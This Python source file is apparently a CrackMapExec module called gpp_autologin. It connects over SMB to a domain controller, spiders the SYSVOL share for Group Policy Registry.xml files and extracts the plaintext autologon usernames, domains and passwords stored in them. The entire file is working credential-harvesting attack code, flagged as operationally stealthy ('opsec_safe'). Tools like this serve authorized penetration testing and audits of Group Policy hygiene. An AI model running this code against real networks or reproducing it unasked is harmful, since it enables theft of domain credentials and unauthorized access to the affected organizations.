import xml.etree.ElementTree as ET
from StringIO import StringIO

class CMEModule:
    '''
      Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1
      Module by @byt3bl33d3r
    '''

    name = 'gpp_autologin'
    description = 'Searches the domain controller for registry.xml to find autologon information and returns the username and password.'
    supported_protocols = ['smb']
    opsec_safe = True
    multiple_hosts = True

    def options(self, context, module_options):
        '''
        '''

    def on_login(self, context, connection):
        shares = connection.shares()
        for share in shares:
            if share['name'] == 'SYSVOL' and 'READ' in share['access']:

                context.log.success('Found SYSVOL share')
                context.log.info('Searching for Registry.xml')

                paths = connection.spider('SYSVOL', pattern=['Registry.xml'])

                for path in paths:
                    context.log.info('Found {}'.format(path))

                    buf = StringIO()
                    connection.conn.getFile('SYSVOL', path, buf.write)
                    xml = ET.fromstring(buf.getvalue())

                    if xml.findall('.//Properties[@name="DefaultPassword"]'):
                        usernames = []
                        passwords = []
                        domains   = []

                        xml_section = xml.findall(".//Properties")

                        for section in xml_section:
                            attrs = section.attrib

                            if attrs['name'] == 'DefaultPassword':
                                passwords.append(attrs['value'])

                            if attrs['name'] == 'DefaultUserName':
                                usernames.append(attrs['value'])

                            if attrs['name'] == 'DefaultDomainName':
                                domains.append(attrs['value'])

                        if usernames or passwords:
                            context.log.success('Found credentials in {}'.format(path))
                            context.log.highlight('Usernames: {}'.format(usernames))
                            context.log.highlight('Domains: {}'.format(domains))
                            context.log.highlight('Passwords: {}'.format(passwords))